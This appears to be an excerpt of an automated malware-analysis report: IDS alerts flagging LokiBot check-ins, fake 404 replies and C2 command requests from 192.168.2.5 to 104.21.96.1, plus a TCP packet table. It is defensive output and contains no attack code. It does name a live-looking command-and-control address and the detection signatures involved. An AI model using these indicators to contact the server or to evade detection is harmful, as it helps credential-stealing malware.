2025-02-25T05:25:00.257285+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49976	TCP
2025-02-25T05:25:01.410148+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:01.410148+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:01.410148+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:02.133231+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:04.109784+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:04.114840+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50004	TCP
2025-02-25T05:25:05.320340+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:05.320340+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:05.320340+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:06.066009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:06.071085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50007	TCP
2025-02-25T05:25:07.217222+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:07.217222+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:07.217222+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:07.965764+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:07.970889+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50008	TCP
2025-02-25T05:25:09.128533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:09.128533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:09.128533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:09.877106+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:11.823241+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:11.828359+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50010	TCP
2025-02-25T05:25:12.999939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:12.999939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:12.999939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:13.772613+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:13.777704+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50011	TCP
2025-02-25T05:25:14.943218+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:14.943218+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:14.943218+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:15.688616+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:15.693672+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50012	TCP
2025-02-25T05:25:16.841565+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:16.841565+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:16.841565+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:17.605902+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:17.611002+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50013	TCP
2025-02-25T05:25:18.785842+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:18.785842+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:18.785842+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:19.405903+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:19.410941+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50014	TCP
2025-02-25T05:25:20.582160+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:20.582160+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:20.582160+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:21.306113+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:23.267064+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:23.272185+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50016	TCP
2025-02-25T05:25:24.422327+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:24.422327+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:24.422327+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:25.153137+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:27.054481+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:28.971804+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:28.977409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50019	TCP
2025-02-25T05:25:30.140838+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:30.140838+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:30.140838+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:30.941623+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:30.946727+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50020	TCP
2025-02-25T05:25:32.134031+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:32.134031+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:32.134031+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:32.905995+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:32.914062+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50021	TCP
2025-02-25T05:25:34.079242+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:34.079242+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:34.079242+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:34.791351+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:36.740193+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:36.745246+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50023	TCP
2025-02-25T05:25:37.908677+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:37.908677+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:37.908677+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:38.670110+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:38.675147+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50024	TCP
2025-02-25T05:25:39.832786+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:39.832786+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:39.832786+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:40.573705+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:42.543813+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:42.548921+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50026	TCP
2025-02-25T05:25:43.709004+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:43.709004+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:43.709004+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:44.429533+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:46.524821+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:46.529931+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50028	TCP
2025-02-25T05:25:47.694139+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:47.694139+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:47.694139+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:48.450830+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:48.455909+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50029	TCP
2025-02-25T05:25:49.782796+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:49.782796+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:49.782796+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:50.491077+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:52.472350+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:52.480048+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50031	TCP
2025-02-25T05:25:53.663006+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:53.663006+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:53.663006+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:54.439089+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:54.444104+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50032	TCP
2025-02-25T05:25:55.595533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:55.595533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:55.595533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:56.310385+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:58.268082+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:58.273278+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50034	TCP
2025-02-25T05:25:59.460377+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:25:59.460377+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:25:59.460377+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:00.224886+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:00.229947+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50035	TCP
2025-02-25T05:26:01.398189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:01.398189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:01.398189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:02.181519+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:02.186610+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50036	TCP
2025-02-25T05:26:03.448370+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:03.448370+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:03.448370+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:04.182458+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:06.007993+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:06.013075+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50038	TCP
2025-02-25T05:26:07.176187+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:07.176187+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:07.176187+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:07.939009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:07.944101+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50039	TCP
2025-02-25T05:26:09.117397+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:09.117397+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:09.117397+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:09.848187+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:11.935736+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:11.940779+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	50041	TCP
2025-02-25T05:26:13.086717+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50042	104.21.96.1	80	TCP
2025-02-25T05:26:13.086717+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50042	104.21.96.1	80	TCP
2025-02-25T05:26:13.086717+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50042	104.21.96.1	80	TCP
2025-02-25T05:26:13.796031+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50042	104.21.96.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 05:24:11.084394932 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.089538097 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:11.092097044 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.094521999 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.099533081 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:11.100054026 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.105159044 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:11.820811033 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:11.820981979 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.821618080 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:11.821681023 CET	49704	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:11.826059103 CET	80	49704	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.051644087 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.057636023 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.057755947 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.060691118 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.065757990 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.065853119 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.070919991 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.815632105 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.815999031 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.816678047 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.816739082 CET	49705	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.821070910 CET	80	49705	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.892735958 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.898057938 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.900084972 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.902112007 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.907160044 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:13.907229900 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:13.912368059 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:14.677139997 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:14.677396059 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:14.677464008 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:14.677791119 CET	49706	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:14.682527065 CET	80	49706	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:15.818527937 CET	49707	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:15.823692083 CET	80	49707	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:15.823786974 CET	49707	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:15.825815916 CET	49707	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:15.830852985 CET	80	49707	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:15.830902100 CET	49707	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:24:15.835912943 CET	80	49707	104.21.96.1	192.168.2.5
Feb 25, 2025 05:24:16.568116903 CET	80	49707	104.21.96.1	192.168.2.5
